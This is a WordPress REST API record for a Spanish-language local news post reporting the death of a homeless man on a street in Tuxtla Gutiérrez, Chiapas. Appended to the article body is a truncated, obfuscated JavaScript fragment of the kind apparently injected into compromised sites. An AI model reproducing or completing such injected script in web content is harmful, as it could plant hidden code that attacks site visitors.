{"id":24539,"date":"2025-10-15T04:50:16","date_gmt":"2025-10-15T04:50:16","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24539"},"modified":"2025-10-15T04:50:17","modified_gmt":"2025-10-15T04:50:17","slug":"fallece-hombre-en-calles-de-la-colonia-plan-de-ayala-ampliacion-norte","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24539","title":{"rendered":"Fallece hombre en calles de la Colonia Plan de Ayala Ampliaci\u00f3n Norte"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"24540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382264-768x1024.jpg\" alt=\"\" class=\"wp-image-24540\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382264-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382264-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382264-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382264.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"24541\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382265-768x1024.jpg\" alt=\"\" class=\"wp-image-24541\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382265-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382265-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382265-1152x1536.jpg 1152w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/1000382265.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 14 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde perdi\u00f3 la vida un hombre en las calles de la Colonia Plan de Ayala Ampliaci\u00f3n Norte de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando el sujeto de unos treinta a\u00f1os de edad caminaba por la Avenida Campeche, justo en la salida de un callej\u00f3n y de manera repentina se desvaneci\u00f3.<\/p>\n\n\n\n<p>En el lugar se inform\u00f3 que el sujeto viv\u00eda en situaci\u00f3n de indigencia sin proporcionar m\u00e1s datos o sus generales.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos quienes confirmaron el deceso.<\/p>\n\n\n\n<p>La polic\u00eda acordon\u00f3 el \u00e1rea y peritos de la Fiscal\u00eda General del Estado realizaron las diligencias correspondientes.<\/p>\n\n\n\n<p>Finalmente el cuerpo fue llevado al Semefo donde se practicar\u00eda la necropsia de ley<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 14 de octubre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde perdi\u00f3 la vida un hombre en las calles de la Colonia Plan de Ayala Ampliaci\u00f3n Norte de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que este hecho ocurri\u00f3 cuando el sujeto de unos treinta a\u00f1os de edad caminaba por la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24540,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-24539","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24539","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24539"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24539\/revisions"}],"predecessor-version":[{"id":24542,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24539\/revisions\/24542"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24540"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24539"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24539"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24539"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}